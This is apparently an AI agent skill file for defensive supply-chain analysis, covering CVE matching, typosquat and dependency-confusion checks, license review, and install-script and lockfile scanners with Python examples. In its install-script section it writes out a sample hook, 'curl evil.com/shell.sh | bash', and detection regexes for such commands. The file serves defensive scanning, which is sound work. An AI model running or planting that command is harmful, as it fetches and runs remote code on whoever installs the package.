# perseus-supply-chain
Supply chain security analysis (CVEs, dependencies, typosquatting, licenses)
| name | perseus-supply-chain |
| description | Supply chain security analysis (CVEs, dependencies, typosquatting, licenses) |
IMPORTANT: This skill performs supply chain security analysis on the user's own codebase. This is defensive security testing to find vulnerable dependencies before they're exploited.
Authorization: The user owns this codebase and has explicitly requested this specialized analysis.
| Language | Package Managers | Manifest Files |
|---|---|---|
| JavaScript/TypeScript | npm, yarn, pnpm, bun | package.json, package-lock.json, yarn.lock, pnpm-lock.yaml |
| Go | go modules | go.mod, go.sum |
| PHP | Composer | composer.json, composer.lock |
| Python | pip, poetry, pipenv | requirements.txt, Pipfile, pyproject.toml, poetry.lock |
| Rust | Cargo | Cargo.toml, Cargo.lock |
| Java | Maven, Gradle | pom.xml, build.gradle, gradle.lockfile |
| Ruby | Bundler | Gemfile, Gemfile.lock |
| C# | NuGet | *.csproj, packages.config, packages.lock.json |
This specialist skill performs comprehensive supply chain analysis including known vulnerabilities (CVEs), dependency confusion, typosquatting, and license compliance.
When to Use: After /scan identifies package manifests, or as a regular security hygiene check.
Goal: Identify vulnerable, malicious, or risky dependencies before they compromise the application.
| Mode | Specialist Behavior |
|---|---|
| PRODUCTION_SAFE | Manifest and advisory analysis only (passive) |
| STAGING_ACTIVE | Controlled resolver/registry validation in staging |
| LAB_FULL | Deep dependency behavior validation in isolated lab |
| LAB_RED_TEAM | Confusion/typosquat simulation against private test registries only |
Read `deliverables/engagement_profile.md` before running any active package resolution checks; use `PRODUCTION_SAFE` when the mode is missing.

| Risk | Description | Impact |
|---|---|---|
| Known CVEs | Published vulnerabilities | Exploitation |
| Typosquatting | Malicious similar-named packages | Malware |
| Dependency Confusion | Private/public package name collision | Code execution |
| Outdated Dependencies | Old versions with known issues | Security debt |
| License Issues | GPL in proprietary, license conflicts | Legal risk |
| Malicious Packages | Intentionally harmful packages | Backdoor |
| Abandoned Packages | Unmaintained dependencies | Future risk |
Respect the scope defined in `deliverables/engagement_profile.md` and, if present, `deliverables/verification_scope.md`.

Manifest Scanner:
Files to Find:

```text
# JavaScript/TypeScript
package.json
package-lock.json
yarn.lock
pnpm-lock.yaml
bun.lockb
# Go
go.mod
go.sum
# PHP
composer.json
composer.lock
# Python
requirements.txt
requirements-*.txt
Pipfile
Pipfile.lock
pyproject.toml
poetry.lock
# Rust
Cargo.toml
Cargo.lock
# Java
pom.xml
build.gradle
build.gradle.kts
gradle.lockfile
# Ruby
Gemfile
Gemfile.lock
# C#
*.csproj
packages.config
Directory.Packages.props
```
JavaScript CVE Analyst:
Check Using:
Output Format:
| Package | Version | CVE | Severity | Fixed In |
|---------|---------|-----|----------|----------|
| lodash | 4.17.15 | CVE-2021-23337 | High | 4.17.21 |
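The matching step behind that output table, as an added example that is not part of the perseus-supply-chain skill: installed versions are read from a package-lock.json and compared against advisory version ranges. The advisory records and the lockfile excerpt are constructed for the demo (the lodash entry mirrors the table above; the follow-redirects advisory id is a placeholder), and a real run would pull advisories from an advisory database instead.

```python
"""Match installed npm packages against a constructed advisory list.

Added example, not part of the perseus-supply-chain skill. ADVISORIES and
LOCKFILE are hand-written demo data.
"""
import json
import re

# Constructed advisory records. "fixed" is the first non-vulnerable
# version, so a package is affected when introduced <= version < fixed.
ADVISORIES = [
    {"package": "lodash", "introduced": "0.0.0", "fixed": "4.17.21",
     "id": "CVE-2021-23337", "severity": "High"},
    {"package": "follow-redirects", "introduced": "0.0.0", "fixed": "1.14.7",
     "id": "PLACEHOLDER-ADVISORY-ID", "severity": "High"},
]

# Constructed package-lock.json (lockfileVersion 2) excerpt.
LOCKFILE = json.dumps({
    "packages": {
        "": {"name": "demo"},
        "node_modules/lodash": {"version": "4.17.15"},
        "node_modules/axios": {"version": "0.21.1"},
        "node_modules/follow-redirects": {"version": "1.14.8"},
    }
})


def parse_version(v):
    """Turn '4.17.15' (pre-release suffix ignored) into a comparable int tuple."""
    core = re.search(r"\d+(\.\d+)*", v).group(0)
    return tuple(int(x) for x in core.split("."))


def installed_packages(lockfile_text):
    """Yield (name, version) for every entry in a v2/v3 package-lock.json."""
    data = json.loads(lockfile_text)
    for path, entry in data.get("packages", {}).items():
        if not path:
            continue  # "" is the root project itself
        # Scoped names keep their "@scope/" prefix after the last node_modules/.
        name = path.split("node_modules/")[-1]
        yield name, entry["version"]


def find_vulnerable(lockfile_text, advisories=ADVISORIES):
    """Return (package, version, id, severity, fixed_in) rows for affected packages."""
    rows = []
    for name, version in installed_packages(lockfile_text):
        v = parse_version(version)
        for adv in advisories:
            if adv["package"] != name:
                continue
            if parse_version(adv["introduced"]) <= v < parse_version(adv["fixed"]):
                rows.append((name, version, adv["id"], adv["severity"], adv["fixed"]))
    return rows


def render_table(rows):
    """Render rows in the skill's markdown output format."""
    lines = ["| Package | Version | CVE | Severity | Fixed In |",
             "|---|---|---|---|---|"]
    lines += ["| %s | %s | %s | %s | %s |" % r for r in rows]
    return "\n".join(lines)


if __name__ == "__main__":
    print(render_table(find_vulnerable(LOCKFILE)))
```

Note that follow-redirects 1.14.8 is not reported: it sits at or above the fixed version, which is exactly the comparison a scanner must get right to avoid both false positives and missed findings. Real advisories often carry several affected ranges per package (one per release line); the same loop handles that by listing one record per range.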
Go CVE Analyst:
Check:
Python CVE Analyst:
Check:
Multi-Language CVE Analyst:
Check:
JavaScript Typosquatting Analyst:
Common Patterns:
| Real Package | Typosquat Examples |
|---|---|
| lodash | lodsh, lodahs, 1odash, lodash-utils |
| express | expres, expresss, expess |
| react | raect, reakt, reactjs (unofficial) |
| axios | axois, axio, axiosjs |
Detection Rules:
Multi-Language Typosquatting Analyst:
Python Examples:
| Real Package | Typosquat Examples |
|---|---|
| requests | request, reqeusts |
| django | djang0, djangoo |
| flask | flaask, flaskk |
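Detection logic covering both the JavaScript and Python tables above, as an added example that is not part of the perseus-supply-chain skill. It flags names that are one edit away from a popular package, names that collapse onto a popular package once homoglyphs and separators are normalized (the `1odash` / `djang0` cases), affixed variants such as `lodash-utils` or `reactjs`, and a popular name from one ecosystem appearing in another. The `POPULAR` lists are constructed for the demo; a real check would use the registry's download-ranked top packages.

```python
"""Flag dependency names that look like typosquats of popular packages.

Added example, not part of the perseus-supply-chain skill. POPULAR is a
constructed stand-in for a registry's top-downloaded package list.
"""

POPULAR = {
    "npm": ["lodash", "express", "react", "axios"],
    "pypi": ["requests", "django", "flask"],
}

# Look-alike characters mapped back to the letter they imitate; separators dropped.
HOMOGLYPHS = str.maketrans(
    {"1": "l", "0": "o", "3": "e", "5": "s", "-": None, "_": None, ".": None})


def normalize(name):
    """Lower-case, strip an npm scope prefix, map homoglyphs, drop separators."""
    name = name.lower().split("/")[-1]
    return name.translate(HOMOGLYPHS)


def edit_distance(a, b):
    """Optimal-string-alignment distance: insert, delete, substitute, adjacent swap."""
    prev2, prev = None, list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cost = 0 if ca == cb else 1
            best = min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost)
            if i > 1 and j > 1 and ca == b[j - 2] and a[i - 2] == cb:
                best = min(best, prev2[j - 2] + 1)  # transposition
            cur.append(best)
        prev2, prev = prev, cur
    return prev[-1]


def check_name(name, ecosystem):
    """Return (reason, confidence) when a name looks suspicious, else None."""
    raw = name.lower().split("/")[-1]
    if raw in POPULAR.get(ecosystem, []):
        return None  # the genuine package
    for eco, names in POPULAR.items():
        if raw in names:
            return ("name of %s package %s used in %s" % (eco, raw, ecosystem), "Medium")
    norm = normalize(raw)
    for pop in POPULAR.get(ecosystem, []):
        if norm == pop:
            return ("homoglyph/separator variant of %s" % pop, "High")
        if edit_distance(norm, pop) == 1:
            return ("one edit away from %s" % pop, "High")
        if raw.startswith(pop) and len(raw) - len(pop) <= 6:
            return ("affixed variant of %s" % pop, "Medium")
    return None


def scan_names(names, ecosystem):
    """Scan dependency names from one manifest; return [(name, reason, confidence)]."""
    findings = []
    for name in names:
        hit = check_name(name, ecosystem)
        if hit:
            findings.append((name, hit[0], hit[1]))
    return findings


if __name__ == "__main__":
    for row in scan_names(["lodash", "lodsh", "1odash", "lodash-utils", "requests"], "npm"):
        print(row)
```

The affixed-variant rule is deliberately reported at Medium: legitimate companions such as `lodash-es` trip it, so the analyst allowlists known-good affixes rather than raising the confidence. The cross-ecosystem rule encodes the "Python package in npm?" finding from the report template.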
Private Package Analyst:
Risk Pattern:

```jsonc
// package.json - RISKY
{
  "dependencies": {
    "@company/internal-lib": "^1.0.0" // If not in private registry...
  }
}
```
Attack: an attacker publishes `@company/internal-lib` to public npm, so installs that are not pinned to the private registry pull the public copy.
Check:
Registry Configuration Analyst:
Files to Check:

```text
.npmrc
.yarnrc
.yarnrc.yml
.pip/pip.conf
~/.config/pip/pip.conf
```
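The private-package and registry-configuration checks together, as an added example that is not part of the perseus-supply-chain skill: every scoped npm dependency is checked for a matching `@scope:registry=` line in `.npmrc`, and `pip.conf` is inspected for `extra-index-url`, the setting that lets pip consider a public index alongside a private one. The manifest, `.npmrc` and `pip.conf` contents are constructed for the demo, and `@company`, `@acme` and the `*.example` hosts are placeholders.

```python
"""Check that private-looking packages are pinned to a private registry.

Added example, not part of the perseus-supply-chain skill. All file
contents below are constructed; scopes and hosts are placeholders.
"""
import configparser
import json

PACKAGE_JSON = json.dumps({
    "dependencies": {
        "@company/internal-lib": "^1.0.0",
        "@company/core": "^2.3.0",
        "@acme/widgets": "^0.4.0",
        "lodash": "^4.17.21",
    }
})

NPMRC = """\
registry=https://registry.npmjs.org/
@company:registry=https://npm.internal.example/
//npm.internal.example/:_authToken=${NPM_TOKEN}
"""

PIP_CONF = """\
[global]
index-url = https://pypi.org/simple
extra-index-url = https://pypi.internal.example/simple
"""


def npmrc_scope_registries(text):
    """Return {scope: registry_url} from the '@scope:registry=' lines of an .npmrc."""
    scopes = {}
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("@") and ":registry=" in line:
            scope, url = line.split(":registry=", 1)
            scopes[scope] = url.strip()
    return scopes


def unpinned_scopes(package_json_text, npmrc_text):
    """Return scoped dependencies whose scope has no private registry in .npmrc.

    Such names resolve through the default (public) registry, which is the
    precondition for dependency confusion."""
    manifest = json.loads(package_json_text)
    names = list(manifest.get("dependencies", {})) + list(manifest.get("devDependencies", {}))
    scopes = npmrc_scope_registries(npmrc_text)
    return sorted(n for n in names if n.startswith("@") and n.split("/")[0] not in scopes)


def pip_extra_index_risk(pip_conf_text):
    """Return the extra-index-url value if pip.conf mixes a private index with the public one.

    With extra-index-url pip merges candidates from both indexes and installs
    the highest version, so a same-named public package can win. A private
    index should instead be the sole index-url, proxying public packages."""
    cfg = configparser.ConfigParser()
    cfg.read_string(pip_conf_text)
    return cfg.get("global", "extra-index-url", fallback=None)


if __name__ == "__main__":
    print("unpinned npm scopes:", unpinned_scopes(PACKAGE_JSON, NPMRC))
    print("pip extra-index-url:", pip_extra_index_risk(PIP_CONF))
```

`@company/*` passes because `.npmrc` routes the whole scope to the internal registry; `@acme/widgets` is reported because nothing pins its scope. The pip check reports the `extra-index-url` value itself so the analyst can see which private index is being mixed with the public one.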
Major Version Gap Analyst:
Risk Levels:
| Gap | Risk | Example |
|---|---|---|
| 1 major | Low | Using React 17 when 18 is out |
| 2+ major | Medium | Using React 16 when 18 is out |
| EOL | High | Using Node.js 14 (EOL) |
Abandoned Package Analyst:
Indicators:
License Compatibility Analyst:
Risk Matrix:
| Project License | Dependency License | Status |
|---|---|---|
| MIT | MIT | OK |
| MIT | Apache-2.0 | OK |
| MIT | GPL-3.0 | PROBLEM (copyleft) |
| Proprietary | GPL-3.0 | PROBLEM (copyleft) |
| Proprietary | AGPL-3.0 | CRITICAL |
License Discovery Analyst:
Issues:
Install Script Analyst:
Patterns to Flag:

```jsonc
// package.json - SUSPICIOUS
{
  "scripts": {
    "preinstall": "curl evil.com/shell.sh | bash",
    "postinstall": "node ./scripts/setup.js" // Check contents!
  }
}
```
Red Flags:
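A scanner for the lifecycle-hook patterns above, as an added example that is not part of the perseus-supply-chain skill. It reads the `scripts` block of a package.json, looks only at hooks that run automatically on install, and matches each against a small set of red-flag regexes; a hook that matches nothing is still reported at low priority, because the file it invokes (the `setup.js` case above) has to be read by hand. The sample manifest is constructed and reuses the page's `curl ... | bash` pattern.

```python
"""Flag suspicious npm lifecycle scripts in package.json.

Added example, not part of the perseus-supply-chain skill. SAMPLE is a
constructed manifest; RED_FLAGS is a starting set, not an exhaustive one.
"""
import json
import re

# Hooks npm runs without the user invoking them explicitly.
LIFECYCLE = ("preinstall", "install", "postinstall", "prepare",
             "preuninstall", "postuninstall")

# (regex, reason, severity), checked in order; the first match is reported.
RED_FLAGS = [
    (r"\b(curl|wget)\b[^|;&]*\|\s*(ba)?sh\b", "downloads and pipes a script into a shell", "High"),
    (r"\b(curl|wget|Invoke-WebRequest|iwr)\b", "fetches a remote resource at install time", "High"),
    (r"base64\s+(-d|--decode)|\batob\(", "decodes a base64 payload", "High"),
    (r"\beval\b|new Function\(", "dynamic code evaluation", "High"),
    (r"\bnode\s+-e\s", "runs inline node code", "Medium"),
    (r"\.(sh|ps1)\b", "runs a shell or PowerShell script", "Medium"),
    (r"\$\{?[A-Z_]*(TOKEN|SECRET|PASSWORD|KEY)\b", "references a credential env var", "Medium"),
]

SAMPLE = json.dumps({
    "name": "demo",
    "scripts": {
        "preinstall": "curl evil.com/shell.sh | bash",
        "postinstall": "node ./scripts/setup.js",
        "build": "tsc -p .",
        "test": "jest",
    }
})


def scan_scripts(package_json_text):
    """Return [(hook, command, reason, severity)] for every lifecycle hook present."""
    scripts = json.loads(package_json_text).get("scripts", {})
    findings = []
    for hook in LIFECYCLE:
        cmd = scripts.get(hook)
        if cmd is None:
            continue
        for pattern, reason, severity in RED_FLAGS:
            if re.search(pattern, cmd):
                findings.append((hook, cmd, reason, severity))
                break
        else:
            # No pattern matched, but the hook still runs on every install:
            # the invoked file needs a manual read before the package is trusted.
            findings.append((hook, cmd, "lifecycle hook present; review invoked file", "Low"))
    return findings


if __name__ == "__main__":
    for finding in scan_scripts(SAMPLE):
        print(finding)
```

Ordinary scripts such as `build` and `test` are ignored: they only run when invoked, so they are not part of the install-time attack surface. Run the same function over every `node_modules/*/package.json` to cover transitive dependencies, which is where install hooks usually hide.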
Dependency Chain Analyst:
Issues:
Lockfile Security Analyst:
Issues:
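A lockfile audit, as an added example that is not part of the perseus-supply-chain skill: it walks a package-lock.json (lockfileVersion 2), reports entries with no `integrity` hash or a non-SHA-512 one, entries whose `resolved` URL is not HTTPS or points at a host outside the allowed registries, and dependencies declared in package.json that the lockfile does not contain at all. The lockfile excerpt, the hash strings and the allowed hosts are constructed for the demo.

```python
"""Audit a package-lock.json for weak integrity data and unexpected sources.

Added example, not part of the perseus-supply-chain skill. LOCKFILE and
ALLOWED_HOSTS are constructed; the integrity values are not real hashes.
"""
import json
from urllib.parse import urlparse

# Registries this project is allowed to install from (constructed).
ALLOWED_HOSTS = {"registry.npmjs.org", "npm.internal.example"}

LOCKFILE = json.dumps({
    "name": "demo",
    "lockfileVersion": 2,
    "packages": {
        "": {"name": "demo", "dependencies": {
            "lodash": "^4.17.21", "left-pad": "^1.3.0",
            "@company/core": "^2.0.0", "chalk": "^5.0.0"}},
        "node_modules/lodash": {
            "version": "4.17.21",
            "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz",
            "integrity": "sha512-CONSTRUCTED"},
        "node_modules/left-pad": {
            "version": "1.3.0",
            "resolved": "http://mirror.example/left-pad-1.3.0.tgz"},
        "node_modules/@company/core": {
            "version": "2.0.0",
            "resolved": "git+ssh://git@github.com/company/core.git#abc123",
            "integrity": "sha1-CONSTRUCTED"},
    }
})


def audit_lockfile(text, allowed_hosts=ALLOWED_HOSTS):
    """Return [(package, issue)] for every lock entry that weakens reproducibility."""
    packages = json.loads(text).get("packages", {})
    issues = []
    # Root entry ("") lists what package.json declares; track which ones we see.
    declared = set(packages.get("", {}).get("dependencies", {}))
    for path, entry in packages.items():
        if not path:
            continue
        name = path.split("node_modules/")[-1]
        declared.discard(name)

        integrity = entry.get("integrity", "")
        if not integrity:
            issues.append((name, "no integrity hash"))
        elif not integrity.startswith("sha512-"):
            issues.append((name, "weak integrity algorithm %s" % integrity.split("-")[0]))

        url = urlparse(entry.get("resolved", ""))
        if url.scheme != "https":
            issues.append((name, "non-https source %s" % (url.scheme or "none")))
        elif url.hostname not in allowed_hosts:
            issues.append((name, "unexpected registry host %s" % url.hostname))

    for name in sorted(declared):
        issues.append((name, "declared in package.json but absent from lockfile"))
    return issues


if __name__ == "__main__":
    for issue in audit_lockfile(LOCKFILE):
        print("%-16s %s" % issue)
```

The git source on `@company/core` is reported twice (non-HTTPS and a SHA-1 integrity) because a commit-pinned git dependency bypasses the registry entirely and gives the installer nothing comparable to a registry tarball hash; a missing lock entry (`chalk`) means the next `npm install` resolves that package fresh, so the lockfile no longer guarantees what ships.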
Create deliverables/supply_chain_analysis.md:
# Supply Chain Security Analysis
## Summary
| Category | Packages Checked | Issues | Critical |
|----------|------------------|--------|----------|
| CVEs | X | Y | Z |
| Typosquatting | X | Y | Z |
| Dependency Confusion | X | Y | Z |
| Outdated | X | Y | Z |
| License | X | Y | Z |
| Malicious | X | Y | Z |
## Languages/Package Managers Detected
- JavaScript: npm (package.json)
- Python: pip (requirements.txt)
- Go: go modules (go.mod)
## Critical Vulnerabilities (CVEs)
### [CVE-2021-44228] Log4Shell in log4j
**Severity:** Critical (CVSS 10.0)
**Package:** org.apache.logging.log4j:log4j-core
**Installed Version:** 2.14.1
**Fixed Version:** 2.17.1
**Location:** pom.xml
**Description:** Remote code execution via JNDI lookup in log messages.
**Remediation:**
```xml
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.17.1</version>
</dependency>
```

**Severity:** High (CVSS 8.0)
**Package:** follow-redirects
**Installed Version:** 1.14.5
**Fixed Version:** 1.14.7
**Location:** package-lock.json (transitive via axios)

| Severity | Count | Packages |
|---|---|---|
| Critical | 2 | log4j, lodash |
| High | 5 | axios, node-forge, ... |
| Medium | 12 | ... |
| Low | 8 | ... |

| Installed | Suspicious | Confidence |
|---|---|---|
| lodsh | Likely typosquat of lodash | High |
| requests (in npm) | Python package in npm? | Medium |

| Package | Risk | Recommendation |
|---|---|---|
| @company/core | No registry lock | Add to .npmrc |

| Package | Current | Latest | Gap | Risk |
|---|---|---|---|---|
| react | 16.14.0 | 18.2.0 | 2 major | Medium |
| node | 14.x | 20.x | EOL | High |

| Package | License | Issue |
|---|---|---|
| some-lib | GPL-3.0 | Copyleft in MIT project |
| unknown-pkg | UNLICENSED | No license |

```bash
# JavaScript
npm audit fix
npm outdated
# Go
go get -u ./...
govulncheck ./...
# Python
pip-audit
pip list --outdated
# Rust
cargo audit
cargo update
```
**Next Step:** CVE findings can be verified by checking exploit availability and running automated scanners.